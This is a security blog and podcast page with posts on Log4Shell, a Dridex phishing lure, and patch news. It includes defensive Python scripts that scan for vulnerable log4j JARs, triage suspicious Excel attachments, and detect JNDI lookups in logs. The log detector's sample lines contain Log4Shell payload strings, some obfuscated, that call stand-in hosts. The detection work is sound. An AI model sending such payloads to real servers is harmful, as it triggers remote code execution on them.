The Technology blog and podcast

This is the technology blog and podcast: commentary, articles, and podcasts.


SANS NewsBites, December 28, 2021

Hello everyone, welcome to the blog. We’re going to start the blog posts with SANS NewsBites. In the December 28th edition, we find some news regarding Log4J, other breaches in the health care industry, and more.

Here is the Web page version of the newsletter that was sent on the 28th.

I hope that this finds you well.


More Log4J news read during the holiday

During the holiday break, I have been doing some reading and found some articles I want to talk about. Two of the three articles in this post were sent to the Security Box email list; the third was more for people who need to know what to look for to protect servers and other systems from this ordeal, and it offers steps you can take.

Examining Log4j Vulnerabilities in Connected Cars and Charging Stations

This is probably not a surprise. As part of podcast 74, which dealt with Log4J, we read that cars may be affected, but we really don’t know to what extent.

What we do know is that, at least for now, a proof of concept appears possible.

Here is the opening paragraph. It says:

Evidence of attacks using the Log4j vulnerability was also shown in a test that triggered a bug on a Tesla car. For this case, the source does not provide much information on where it was actually executed. Nevertheless, this means that the exploitation of the vulnerability could still have an impact on the user’s privacy and the general security of the car because a back-end compromise could allow attackers to push actions to the car and serve malicious firmware over-the-air (FOTA) updates.

As we know, the advent of the smartphone gives us a lot of convenience, like checking our email on the go, looking up sports, watching sports or movies, and even playing games. According to this article, it can also replace the keys you would carry in your pocket for an electric car. This, in turn, makes the car a perfect target, as you don’t have to have your key with you while you operate it.

Here are other paragraphs that might be of interest in this discussion.

Beyond the three devices or properties in modern cars discussed in this article, there are still many more to test and monitor for Log4j vulnerabilities. Among them are servers’ responses to tests and plenty of other vectors that could allow attackers to use the access afforded by applications to send commands that can unlock a car, control the heating, and perform other functions that can be abused by malicious actors.

Nobody has thought about that paragraph before, have they? Yes, you don’t need a lot of gas now, and it saves you money, but what about the ways it could be abused, like what was discussed in a Security Now episode where someone rented a car and still had access afterward? There’s more we’re quoting as part of this too.

Up to now, organizations and security experts are still grappling with the full extent of the Log4j vulnerabilities. It is likely that more reports looking into the effects of these vulnerabilities in specific services, devices, or applications will be released in the coming weeks. On the other hand, cybercriminals are also making the most of this time to catch potential victims, including those who are still exposed via unpatched Log4j vulnerabilities, off guard.

The main fix for the vulnerabilities is to update Log4j to version 2.17.0. This version removes the message lookup feature, which provides a way to add values to Log4j’s configuration, entirely. However, in most cases, such as RISE-V2G, using an up-to-date version of Log4j could break applications.

This is unfortunate, and that’s why we continue to see hospitals being burned: they can’t update operating systems and software because it’ll break stuff. I don’t know how to get around that one, I’m afraid.

There’s more, including some commands that can be invoked when things need to get done.

The Log4j story, and how it has impacted our customers

This article was very insightful even though I’m not a Trend customer. They describe what happened. There’s definitely more, because they’re doing research into what is really going on, and this is only one of two articles that could tell the story.

What to Do About Log4j

This article I didn’t send to the TSB list because it’s more for people who need to know how to mitigate the vulnerability. It’s meant for those who have Log4j running within their environment, and I want people to have it since it’s being blogged. You should definitely take a look at this if you’re affected by this vulnerability.
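The first thing any of the mitigation guidance asks for is an inventory: which copies of log4j-core are on a host, what version they are, and whether the JNDI lookup code is still there. As an added example, not code from the article linked above or from Apache, CISA or Trend Micro, here is a small scanner that walks a directory, opens every JAR/WAR/EAR, descends into archives nested inside them (labelled outer!inner), reads the Maven pom.properties for the version and checks for JndiLookup.class. It assumes 2.17.0 as the fixed version, as the Trend Micro quote above states, and treats a JAR whose JndiLookup.class has been deleted as remediated. The sample archives it scans are constructed in a temporary directory for the demonstration and contain no real bytecode.

```python
import io
import os
import re
import tempfile
import zipfile

# Marker paths inside a log4j-core JAR (the real paths used by the library).
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
FIXED = (2, 17, 0)  # assumption: 2.17.0 and later on the 2.x line are treated as fixed
ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")


def parse_version(text):
    """Pull MAJOR.MINOR[.PATCH] out of a Maven pom.properties body."""
    m = re.search(r"^version=(\d+)\.(\d+)(?:\.(\d+))?", text, re.M)
    return tuple(int(x or 0) for x in m.groups()) if m else None


def inspect_archive(data, label):
    """Yield (label, version, has_jndi) for each log4j-core found in `data`,
    descending into nested archives and labelling them outer!inner."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return
    with zf:
        names = set(zf.namelist())
        if POM_PROPS in names or JNDI_CLASS in names:
            version = None
            if POM_PROPS in names:
                version = parse_version(zf.read(POM_PROPS).decode("utf-8", "replace"))
            yield (label, version, JNDI_CLASS in names)
        for name in sorted(names):
            if name.lower().endswith(ARCHIVE_EXT):
                yield from inspect_archive(zf.read(name), label + "!" + name)


def is_vulnerable(version, has_jndi):
    if not has_jndi:
        return False      # class deleted: the JNDI lookup code path is gone
    if version is None:
        return True       # class present but version unknown: assume the worst
    return version < FIXED


def scan_tree(root):
    """Walk `root` and return one finding dict per log4j-core copy."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if not fn.lower().endswith(ARCHIVE_EXT):
                continue
            full = os.path.join(dirpath, fn)
            with open(full, "rb") as fh:
                data = fh.read()
            for label, version, has_jndi in inspect_archive(data, os.path.relpath(full, root)):
                findings.append({"path": label, "version": version, "jndi": has_jndi,
                                 "vulnerable": is_vulnerable(version, has_jndi)})
    return findings


def vulnerable_paths(findings):
    return sorted(f["path"] for f in findings if f["vulnerable"])


def _make_jar(entries):
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()


def build_sample_tree():
    """Constructed fixtures (not real JARs): one vulnerable copy nested in a WAR,
    one at the fixed version, and one older copy with JndiLookup.class removed."""
    root = tempfile.mkdtemp(prefix="log4j-scan-")
    os.makedirs(os.path.join(root, "lib"))
    vuln = _make_jar({POM_PROPS: "version=2.14.1\n", JNDI_CLASS: b"\xca\xfe\xba\xbe"})
    fixed = _make_jar({POM_PROPS: "version=2.17.0\n", JNDI_CLASS: b"\xca\xfe\xba\xbe"})
    stripped = _make_jar({POM_PROPS: "version=2.14.1\n"})
    war = _make_jar({"WEB-INF/lib/log4j-core-2.14.1.jar": vuln})
    for name, data in (("app.war", war), ("lib/log4j-core-2.17.0.jar", fixed),
                       ("lib/log4j-core-stripped.jar", stripped)):
        with open(os.path.join(root, name), "wb") as fh:
            fh.write(data)
    return root


if __name__ == "__main__":
    for f in scan_tree(build_sample_tree()):
        state = "VULNERABLE" if f["vulnerable"] else "ok        "
        print(state, f["path"], f["version"], "JndiLookup present" if f["jndi"] else "JndiLookup removed")
```

Point it at a real application directory with scan_tree("/opt/app") and act on whatever vulnerable_paths returns; the nested-archive descent matters because most of the copies people missed in December 2021 were inside WAR files, not loose on disk.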

I don’t remember which article, but some articles may talk about multiple CVE-2021 numbers as part of the problem. Be safe, get the latest if you can, and keep reading so you can make your environments as safe as possible.


US-CERT releases advice on mitigating Log4J

Hello everyone.

Mitigating Log4Shell and Other Log4j-Related Vulnerabilities was sent on December 22nd, and it discusses and links to information on what companies can do to do their part in making sure they’re protected.

Perusing articles, as I have been doing of late, I see that CyberScoop wrote an article titled CISA, Five Eyes issue guidance meant to slow Log4Shell attacks, which should be read too.

They both have information that you should probably read, and even though this is written on the 24th and posted after Christmas, we’re still in the middle of Log4J (Log4Shell), and a couple more days before posting to the blog isn’t necessarily going to hurt anyone.

If you need to have this information, please heed its warnings, as this is only the beginning.

The JRN hopes that you have had a merry Christmas, and we hope the new year will bring us some good news too.


There’s a fake Christmas Eve termination troublemaker out there; better read this one

Hello folks,

My goal wasn’t necessarily to blog until after the Christmas holiday, except that I saw a post of mine got some traction on LinkedIn, where this CyberScoop article was posted. The article is titled Fake Christmas Eve termination notices used as phishing lures, and it is something that needs immediate posting.

A phishing campaign using a well-known malware family is employing a pair of particularly devious methods to trick targets into opening an infected file: fake employee termination notices and phony omicron-variant exposure warnings.

The particular campaign is our good friend Dridex, which has been around since 2014.

The suspicious email told the target that their employment would cease as of Dec. 24, and that the decision was not reversible. An attached password-protected Excel file promised additional details.

As per usual, the file asks you to click Continue to run a macro, which will infect your machine. According to the article, it says:

Dridex is a trojan dating back to 2014 that typically spreads through email phishing campaigns and is associated with credential theft. It’s been used to steal more than $100 million from financial institutions and banks spread across 40 countries, according to the U.S. Treasury Department.

It further hones my point that it has been around for many years.
Bleeping Computer reported this on the 22nd, and if the campaign isn’t sending the phony termination letters to people, it is full of racial slurs that the researchers have found. That paragraph of the article says:

A reply to TheAnalyst’s tweet containing the phony termination notice noted that in some versions of the email, the “Merry X-Mas” pop-up substituted racial slurs instead of the word “Employees.”

There are two more paragraphs which I’m going to quote. One talks about the racial things that I mentioned above.

The racist messaging with this particular Dridex effort dates back a couple months, TheAnalyst told CyberScoop Thursday. A phishing email sent to targets around Black Friday, for instance, referenced killing “black protesters,” with a license. “If you find this message inappropriate or offensive, do not hesitate to click complaint button in the attached document and we will never contact you again,” the message read.

The hackers also infuse racist email addresses into the malware payloads, TheAnalyst said, as an effort to troll researchers. Targets of the campaigns don’t see this part of the campaign, but researchers who seek out, examine and expose phishing campaigns do.

Besides that, some people may get a message about someone in the company getting infected with the latest Covid-19 variant, and what they need to do to learn more is to open the attached file.

It is, of course, a password-protected file.
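The password is the whole trick: a password-protected .xlsx is no longer a ZIP that a mail gateway can open, because Office wraps the encrypted workbook in an OLE2 compound file carrying an EncryptedPackage stream, so nothing can see the macro until the victim types the password. As an added example, not code from CyberScoop, Bleeping Computer or the researchers quoted above, here is an attachment triage routine that uses that fact: it checks the file signature against the extension, flags the encrypted-OOXML wrapper, and, for files it can open, looks for the xl/vbaProject.bin part (OOXML) or the _VBA_PROJECT_CUR storage (legacy .xls) that hold VBA. The markers are found with a byte search rather than a full OLE parser, which is a heuristic; the sample attachments are constructed byte strings that only mimic the signatures, not real documents or malware, and the allow/review/quarantine thresholds are my own.

```python
import io
import os
import zipfile

OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"   # OLE2 compound file header
ZIP_MAGIC = b"PK\x03\x04"                           # Office Open XML is a ZIP
# OLE2 directory entry names are stored as UTF-16LE, so these markers can be
# located with a plain byte search (heuristic: no container parsing here).
ENCRYPTED_STREAM = "EncryptedPackage".encode("utf-16-le")  # encrypted OOXML wrapper
XLS_VBA_STORAGE = "_VBA_PROJECT_CUR".encode("utf-16-le")  # VBA storage in legacy .xls
VBA_PART = "xl/vbaProject.bin"                              # VBA part in .xlsm/.xlsx ZIP
EXCEL_EXT = {".xls", ".xlsx", ".xlsm", ".xlsb", ".xlam", ".xltm"}
BLOCKING = {"encrypted-ooxml", "legacy-xls-with-vba", "contains-vba-project",
            "unknown-file-signature", "corrupt-zip"}


def triage(filename, data):
    """Classify one attachment as allow / review / quarantine, with reasons."""
    ext = os.path.splitext(filename)[1].lower()
    if ext not in EXCEL_EXT:
        return {"filename": filename, "verdict": "review", "reasons": ["not-an-excel-extension"]}
    reasons = []
    if data.startswith(OLE_MAGIC):
        if ENCRYPTED_STREAM in data:
            reasons.append("encrypted-ooxml")       # password-protected: gateway cannot inspect it
        if XLS_VBA_STORAGE in data:
            reasons.append("legacy-xls-with-vba")
        if not reasons:
            # a 97-2003 workbook without VBA, or an OLE file wearing an OOXML extension
            reasons.append("legacy-binary-workbook" if ext == ".xls"
                           else "ole-container-with-ooxml-extension")
    elif data.startswith(ZIP_MAGIC):
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as zf:
                names = set(zf.namelist())
        except zipfile.BadZipFile:
            names, reasons = set(), ["corrupt-zip"]
        if VBA_PART in names:
            reasons.append("contains-vba-project")
    else:
        reasons.append("unknown-file-signature")   # e.g. an executable renamed .xlsx
    if any(r in BLOCKING for r in reasons):
        verdict = "quarantine"
    elif reasons:
        verdict = "review"
    else:
        verdict = "allow"
    return {"filename": filename, "verdict": verdict, "reasons": reasons}


def _ooxml(entries):
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()


def build_samples():
    """Constructed attachments that only mimic file signatures; none holds a
    real workbook, VBA project or payload."""
    pad = b"\x00" * 504
    encrypted = (OLE_MAGIC + pad + "EncryptionInfo".encode("utf-16-le")
                 + b"\x00" * 32 + ENCRYPTED_STREAM + b"\x00" * 64)
    legacy_macro = (OLE_MAGIC + pad + "Workbook".encode("utf-16-le")
                    + b"\x00" * 32 + XLS_VBA_STORAGE + b"\x00" * 64)
    plain_xlsx = _ooxml({"[Content_Types].xml": "<Types/>", "xl/workbook.xml": "<workbook/>"})
    macro_xlsm = _ooxml({"[Content_Types].xml": "<Types/>", "xl/workbook.xml": "<workbook/>",
                         VBA_PART: b"\x01\x16\x01\x00"})
    return {
        "Termination_Notice.xlsx": encrypted,      # the password-protected lure
        "Covid_Exposure_List.xlsm": macro_xlsm,    # an unprotected macro variant
        "Q4_Budget.xlsx": plain_xlsx,              # an ordinary workbook
        "Old_Report.xls": legacy_macro,            # 97-2003 workbook carrying VBA
    }


def triage_all(samples):
    return {name: triage(name, data) for name, data in samples.items()}


if __name__ == "__main__":
    for r in triage_all(build_samples()).values():
        print(f"{r['verdict']:10} {r['filename']}  {', '.join(r['reasons'])}")
```

The design choice worth noting is that an encrypted workbook is quarantined on sight rather than passed through: the gateway has no way to tell a legitimate protected spreadsheet from the Dridex lure, so the decision has to move to a human who can verify the sender out of band, which is exactly the advice in this post.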

Please make sure you know where you are getting files from. For example, the JRN will always tell you what files are being sent, and will indicate the format if possible. If you don’t see any information about what you’re getting, and you see it’s from any of my team that may represent me, you can contact me by phone, through a trusted address you have on file, or through my contact form.

Please be safe! We don’t want you to get infected and have more problems than you already have. Thanks so much for listening, reading and participating!


The Security Box, podcast 75: 2022 predictions, what do you think?

This is the last podcast of the year, unless something breaks we need to cover in audio.

This week, you’ll get a discussion and even some holiday music for the Christmas Holiday this weekend.

Please find the show notes for the program below the ruler, and I’ll be back with articles of interest after the Christmas holiday. Thanks so much for reading and participating as we navigate the Security landscape together.


Welcome to the Security Box, podcast 75. On this edition of the podcast, come with me as we do a little predicting for 2022 with a Trend Micro article titled Pushing Forward: Key Takeaways From Trend Micro’s Security Predictions for 2022. We’ll also have thoughts on recent news read, and it’s been decided that the full news notes segment will be no more, in favor of topics that need discussion. This doesn’t mean that we won’t cover news, but we’ll cover it a little differently.

Topic


Windows Update foreshadowed by Log4J

Hello everyone,

While I had things to attend to today, I did a little bit of reading and found Krebs On Security’s article dealing with Windows Update.

Unfortunately, we won’t be doing Windows Update because we need to do other topics, but it is important to blog what we can so that people are aware of it.

The article from Brian is titled Microsoft Patch Tuesday, December 2021 Edition for those who want to read it.

The opening paragraph of this mid-December article says:

Microsoft, Adobe, and Google all issued security updates to their products today. The Microsoft patches include six previously disclosed security flaws, and one that is already being actively exploited. But this month’s Patch Tuesday is overshadowed by the “Log4Shell” 0-day exploit in a popular Java library that web server administrators are now racing to find and patch amid widespread exploitation of the flaw.

While this is still true, and Security Now today is titled “Log4J Christmas”, we should be diligent in making sure our software is up to date.

The Security Now program is being taped as we speak, and should be available as a podcast by morning.

In case you missed it, here are several paragraphs as Krebs wrote them for this article.

Log4Shell is the name picked for a critical flaw disclosed Dec. 9 in the popular logging library for Java called “log4j,” which is included in a huge number of Java applications. Publicly released exploit code allows an attacker to force a server running a vulnerable log4j library to execute commands, such as downloading malicious software or opening a backdoor connection to the server.

According to researchers at LunaSec, many, many services are vulnerable to this exploit.
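The Krebs paragraph describes what the attacker achieves but not what the attacker sends: a string such as ${jndi:ldap://attacker-host/a} placed in anything the server logs (a User-Agent header, a request path, a chat message). As an added example, not code from Krebs, LunaSec or Apache, here is detection logic that scans log lines for those lookup strings, first undoing URL encoding and then collapsing the nested-lookup obfuscations attackers used to evade simple string matches (${lower:j}, ${::-j}, ${env:NaN:-j} and similar). The sample access-log lines are constructed for the example and use documentation addresses; the collapsing rules are my own simplification of Log4j’s lookup syntax, not the library’s parser, and they go slightly beyond the page by handling the obfuscated forms as well as the plain one.

```python
import re
import urllib.parse

# An innermost lookup: a ${...} with no further ${ inside it.
INNER = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup after normalisation: capture the URI scheme and the host it calls out to.
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:/{0,2}([^/}:\s]+)", re.I)


def _collapse(m):
    """Replace one innermost lookup with what Log4j would have produced."""
    body = m.group(1)
    if body.lower().lstrip().startswith("jndi:"):
        return m.group(0)                    # keep the payload itself intact
    if ":-" in body:
        return body.rsplit(":-", 1)[1]       # ${x:-default} or ${::-d} -> default
    head, _, rest = body.partition(":")
    if head.lower() in ("lower", "upper"):
        return rest                          # ${lower:j} -> j (matching is case-insensitive)
    return ""                                # unknown lookup: assume it resolves to nothing


def normalize(s):
    """URL-decode (bounded, to defeat double encoding) and collapse nested
    lookups from the inside out until nothing changes."""
    for _ in range(3):
        decoded = urllib.parse.unquote(s)
        if decoded == s:
            break
        s = decoded
    prev = None
    while prev != s:
        prev = s
        s = INNER.sub(_collapse, s)
    return s


def find_jndi(s):
    """Return [{'scheme':..., 'host':...}] for every JNDI lookup in one string."""
    return [{"scheme": m.group(1).lower(), "host": m.group(2)}
            for m in JNDI.finditer(normalize(s))]


def scan_lines(lines):
    """Run find_jndi over numbered log lines and flatten the hits."""
    hits = []
    for n, line in enumerate(lines, 1):
        for h in find_jndi(line):
            hits.append({"line": n, "scheme": h["scheme"], "host": h["host"], "raw": line})
    return hits


# Constructed sample access-log lines (203.0.113.0/24, 198.51.100.0/24 and
# .example are reserved documentation ranges, not real attacker infrastructure).
SAMPLE_LINES = [
    '203.0.113.7 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://203.0.113.5:1389/a}"',
    '203.0.113.8 - - [10/Dec/2021:14:02:15 +0000] '
    '"GET /%24%7Bjndi%3Armi%3A%2F%2Fevil.example%2Fx%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '203.0.113.9 - - [10/Dec/2021:14:03:01 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${lower:j}${::-n}${env:NaN:-d}i:${lower:l}dap://203.0.113.6/x}"',
    '198.51.100.4 - - [10/Dec/2021:14:03:30 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for h in scan_lines(SAMPLE_LINES):
        print(f"line {h['line']}: jndi via {h['scheme']} to {h['host']}")
```

The host that comes back is the useful artefact for incident response: it is where the vulnerable server would have reached out to fetch the attacker's class, so it is what to look for in outbound connection logs and block at egress.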

One of the things mentioned in this article is “Apache Struts”, which was used in earlier attacks.

Regarding Windows Update, the article notes that half a dozen of the patches are rated critical by Microsoft. The flaw already seeing exploitation is CVE-2021-43890.

Malware families like Emotet, Trickbot and BazaLoader may take advantage of this flaw.

There’s much more to the article that I linked above, and I link to the CVE and other info for you to look at if it interests you.

Thanks so much for reading, make it a great day!


Pushing Forward: What do you think the predictions of 2022 will be?

Hello folks,

As I prepare the program for this week, I’m going to talk about predictions. The article is titled Pushing Forward: Key Takeaways From Trend Micro’s Security Predictions for 2022, which I’ve summarized as a list of highlights instead of quoting the article.

Since this is a blog post, we can go ahead and do a bit more of a deep dive on this, and that’s what I’m going to do with this article.

Threat actors or cybercriminals will evolve their tactics, although the TTPs are going to be the same. According to the article, they will evolve and even go after the data our cars have. This should be a concern for those who have cars, because everything you connect to could then be exfiltrated, if the attack is meant to do so.

The headings in this article include:

  • As they focus on making their supply chains more robust via diversification and regionalization, enterprises will implement zero trust principles to keep their environments more secure
  • Global supply chains will be in the crosshairs of fourfold extortion techniques as companies evolve their supply chain operations
  • Enterprises will ensure that cloud security basics are employed to defend their environments against a slew of cloud security threats and achieve a managed level of risk
  • To remain protected against evolving ransomware threats, enterprises will set their sights on protecting their servers with stringent server-hardening and application control policies

Each portion has some very interesting things to say. What worries me, if this does come true, is the server attacks. In theory, they may not necessarily have to lock up the files on the server, but exfiltrate the data completely. While it could be possible for them to lock up the server, this could put us at risk. I’m predicting that if they go this way, we as consumers will have bigger problems, as we would be accessing a server that is infected, and that could in theory be passed on to us. This could be a huge problem, as some of us are still computer based, some may be Android or iOS based, and some may be both PC and Android or iOS based.

While iOS 15.2 has been released to those of us on iOS, Android must do better at making sure its updates reach those of us who use it in a timely manner.

In 2022, Google, the maker of Android, must push its updates the way iOS does. In my opinion, they must make sure their customers get the latest for the phone they have. If Apple can do it, Google should too. Trend Micro didn’t cover this, but I’ll add it anyway.

There is much more in this article, which I highlight and we’ll talk about; feel free to read more and learn, and at least think about what Trend is saying. They have been in this business for 30 years, and they have insight that we consumers don’t. What they write in this article makes complete sense; only time will tell.


Another U.S. Government backdoor hack? Where is the person who can fix this?

So, my question about a recent article sent within the past week to the Security Box list talking about the U.S. Government problems is: Where are the people who are responsible for this issue to resolve it?

By publishing details on whatever vulnerability the government has now, actors can find that post and take advantage of whatever it is, like they’re doing with Log4J and other vulnerabilities they wish to pursue.

This article is an Ars Technica article titled Backdoor gives hackers complete control over federal agency network and should be perused so you can tell other people you might know about it and make sure you and they aren’t infected with whatever this is. I read the article, and the government must be ashamed of itself, and if not, they will be soon.

Read the full article to see what’s going on.


Log4J: it’s being used in targeted attacks

Hello folks,

Trying to do some backreading, I guess I can’t be surprised at the fact that this vulnerability will be used for harm.

In this article, titled Nation-state hackers aim to exploit Log4j software flaw, Microsoft warns, it should not be surprising that countries want to leverage this for their own use.

While this article says that the United States has not been targeted yet, it is a bit dated, and it would not surprise me if things have changed by now. We know that this is a developing story, and as developing stories go, we’ll want to keep watch on it.

This is probably going to be the first of many articles coming, so make sure that you keep your eyes open on what you find, even if we don’t blog it. It may apply to you.

Log4J is something that affects software as well as servers, and as I said as part of Throwback Saturday Night

For a limited time, please download this week’s show where we talk about this. Remember that you can also go to our RSS feed and pick up podcast 74, where we covered this as extensively as we could at the time.

Thanks so much for reading, and make it a great day!


Apple Releases iOS 15.2

The JRN has heard that Apple released iOS 15.2 to address log4j. If that’s the case, wonderful! Besides that, iOS 15.2 fixes some long-standing issues with Siri and possibly other things you might find of interest, thanks to AppleVis.

The article is titled Apple Releases iOS 15.2 and iPadOS 15.2; Bringing Apple Music Voice Plan, App Privacy Report, New Safety Features, and Bug Fixes so if there is anything that is of interest in this list that makes you go and update, that’s great!

There is a report saying that Bluetooth may have issues with this version, especially with braille displays. I haven’t gotten the Orbit 40 to work since I got the replacement unit with iOS 15.1, even though the connection is there and the phone sees it. It doesn’t connect, saying that it isn’t supported. Orbit can’t reproduce it.

Take care.


More on Log4J December 17, 2021: morning reading articles

I’m continuing to read from articles that have been sent to my list about Log4J and I’ll briefly talk about what I’m reading.

Logging system security flaw compromises iCloud, Steam accounts (Ars Technica)

This article talks about the initial report on this explosive vulnerability. Besides podcast 74, which we released yesterday, we’ll be on Throwback Saturday Night for the last hour of their show on the Mix. There is really nothing new within this article, but if you really want the beginning, this may be something worth reading.

Hackers launch over 840,000 attacks through Log4J flaw (Ars Technica)

This was talked about as part of the original articles I took from for podcast 74 of the Security Box. Unfortunately, actors will jump on anything to get their hands into our data, and Clubhouse continues to have rooms about this. I wanted to listen to the weekly news room happening at the time I’m writing, but I can’t listen to it and blog these articles, so hopefully there’ll be a replay of this available that I can catch later.

One of the paragraphs in this article probably doesn’t surprise me any. It says:

Perpetrators include “Chinese government attackers,” according to Charles Carmakal, chief technology officer of cyber company Mandiant.

Since the Chinese have really been up to no good in my opinion, especially during this pandemic, nothing surprises me in regards to this paragraph.

I want to stress this paragraph which states:

The flaw in Log4J allows attackers to easily gain remote control over computers running apps in Java, a popular programming language.

People may confuse Java with JavaScript, but these are two different languages. JavaScript is a scripting language that runs in web pages, while Java is a separate general-purpose language, and Log4J is a Java library.

While I understand Apple has put out a patch, this next paragraph might be of interest. It states:

Both CISA and the UK’s National Cyber Security Centre have now issued alerts urging organizations to make upgrades related to the Log4J vulnerability, as experts attempt to assess the fallout. Amazon, Apple, IBM, Microsoft, and Cisco are among those that have rushed to put out fixes, but no severe breaches have been reported publicly so far.

As I’ve heard in rooms, this Apache logging system is in quite a lot of products and services, and this could be here for quite a while.

Within the podcast, we mentioned our good friend Mirai, and one of the paragraphs within this article talks about other things out there that are using this flaw. That paragraph says:

According to Check Point, nearly half of all attacks have been conducted by known cyber attackers. These included groups using Tsunami and Mirai—malware that turns devices into botnets, or networks used to launch remotely controlled hacks such as denial of service attacks. It also included groups using XMRig, a software that mines the hard-to-trace digital currency Monero.

So … we’ve got actors using quite a number of old friends in new ways that will haunt this industry.

Also, the article indicates that you can get unlimited access with this vulnerability. Apache has now released two patches to deal with this, and according to what I’ve heard in rooms, it’s been out there since 2013.

The paragraph making this statement says:

The flaw has existed unnoticed since 2013, experts say. Matthew Prince, chief executive of cyber group Cloudflare, said it started to be actively exploited from December 1, although there was no “evidence of mass exploitation until after public disclosure” from Apache the following week.

This is definitely going to get very interesting.

As Log4Shell wreaks havoc, payroll service reports ransomware attack (Ars Technica)

This is unfortunate. While Ransomware is on the rise, Log4j is taking hold as an attack vector. The company here is not ruling out the attack point being log4j and they’re very clear that this is going to take weeks to resolve. You should at least check this article out because there may be some similarities, although nothing is confirmed whether the entry point for the ransomware was Log4J or not. Can’t forget this attack point.

Patch fixing critical Log4J 0-day has its own vulnerability that’s under exploit (Ars Technica)

As stated, Apache has released two fixes, and this was covered in clubhouse in various rooms. In the room I left when I wanted to write this post they were mentioning that they’ll be continuing to watch this, as there are people in this industry who are in that room. They also said that the open source software packages and programs are “not secure” anymore after this, and I can see why they are saying that. I’m not about to make that claim, as software like the twitter clients for the blind for the PC are written in the open source system and they’re very safe to use. So, let’s make sure that we mention that there may be software that qualifies as not safe, but not all open source software is going to be unsafe.

The article talks about the earlier 2.15 release and what was fixed in 2.16, so please read this if you need to know what is going on.

More Later

I’ll continue to write more as I continue to read more. This is all I’ve read as I continue to catch up. Let’s make sure we stay as safe as possible.

I’ll also be blogging some of the news too, as we need to be aware of this big-time flaw, so the news will be blogged as well. Thanks for reading!


Run Firefox? Look for an update to Firefox 95

Firefox 95 is out, and according to a recent article I saw on the subject sent to the TSB list, it is quite interesting what they’re doing.

The Ars Technica article is titled Firefox 95 for Windows and Mac introduces RLBox, a new sandboxing tech which talks about it.

They look to improve this technology so that they don’t have to scramble around when a major problem occurs, according to a quote. There’s a link to a write up so go and check this article out.


The Security Box, podcast 74: Log4J

The Security Box was released today, and Clubhouse has the replay in raw form.

You can search me out, and you’ll find the security box room there.

If you want the podcast, please go over to the RSS feed to pick it up.

If you need a direct download, please contact me and I’ll get you a link.


Welcome to the Security Box, podcast 74. On this podcast, something breaking this week called Log4j. We’ll break down three different articles that talk about this. Instead of me doing news notes, we’ll ask listeners if they have any thoughts on what they have read. There may be questions, comments and other topics not mentioned here for you to enjoy too.

Topic

  • Log4J

This is still developing, and we’ll continue to blog about this and other things throughout the holidays.

Thanks so much for checking out the podcast, and make it a great day!


The first article on Log4J

The first article which I saw but only read recently is the first of many. We’ll continue to keep you abreast of what the articles are talking about when we read them, and as I said, this is the first.

The first article is titled The Internet’s biggest players are all affected by critical Log4Shell 0-day and was interesting even though read late.

While Minecraft had some significant issues, other services mentioned in the article have some sort of issue when fed the crafted string that triggers this vulnerability.

We’ve learned that hundreds if not millions of services and people may be affected by this.

More later.


The problem of the month: Log4J

Hello everyone,

As we release the podcast for the Security Box, we had to change the topic to this new vulnerability in Log4j, the Apache logging library for Java.

The podcast covers three articles which are good, but I did find one that was sent to the Security Box’s list last Friday.

We still have a lot to learn, including the fact that information continues to come out about it.

This reminds me of SolarWinds last year, when the Security Box covered it non-stop and I wrote up articles to try and get information out there.

What we do know is quite interesting. We know that some of our past friends we’ve talked about on the exploit side of things are part of this too, including Emotet and Cobalt Strike.

I’m also sure that the Security Box will also have commentary and continued thoughts as we learn more.

There are others I’ve not read as of yet. Four of them were just sent to our list yesterday evening.

Want to subscribe to the Security Box list, where we’ll post articles like these that might be of interest? Click on this link to subscribe to The Security Box list. You’ll be taken to a page on the Mix’s web site.

I hope that this is of value to you, and that we solve this quickly. I’ll have more thoughts as I read.


The Security Box, podcast 73: AT&T and an appliance with potential malware, news notes and much more

Hello everyone, welcome to podcast 73 of the Security Box. On this edition of the podcast, we’ll be having a grand old time. We’ve got a very interesting AT&T issue that business customers may need to hear if nothing else. We’ll have news, notes and more.

The RSS feed has a copy of the program, so feel free to get it. If you can’t get RSS for any reason, let me know and I’ll be happy to send it to you.

Here are the show notes for this program.


Hello folks, welcome to the security box, podcast 73. On this podcast, plenty of news notes and a very interesting topic dealing with AT&T and appliances that are made to bridge the gap between the ISP and the managing of phone calls, conference video systems and similar real-time applications. We hope that you’ll enjoy the program and thanks for listening!

Topic

Business customers need to be aware if they use AT&T products of potential malware.

News Notes

Here are the links to News Notes. Some may be blogged already through the blog, so see if there is something that interests you.

Please enjoy the program and thanks so much for listening.


A UK bill that is great on paper, but how hard is it to enforce?

I just read and put in our show notes an article that asks a question. It’s titled Is the UK government’s new IoT cybersecurity bill fit for purpose?

In practice, I think we all agree by using unique passwords, we’ll start dealing with the problem of the default password. But with that said, there are questions in regards to maintenance and how support personnel can get in to do their job.

There is also something that I don’t think the article covers, which is updates. We know that getting updates to IoT devices can be easy if they’re programmed to check for updates, especially right after a connection to the Internet is established. But what about after that?

Lets discuss this one.


The last of an international Sim-Swapping gang arrested

The final member of an international gang called The Community has been arrested and charged over SIM-swapping activity. This is an ongoing problem, I know, but maybe this is a start.

The article is titled US hacker jailed for role in multimillion-dollar SIM swapping campaign and comes from TechCrunch.

There are others mentioned in this article that were also charged. Some may have had lighter sentences than others, and the article talks about all of it.


Maybe a bonehead award of the day, read the articles and you decide

In my recent readings, there are two articles that cover the same thing. They may both cover it a little bit differently, but they both also say the same thing.

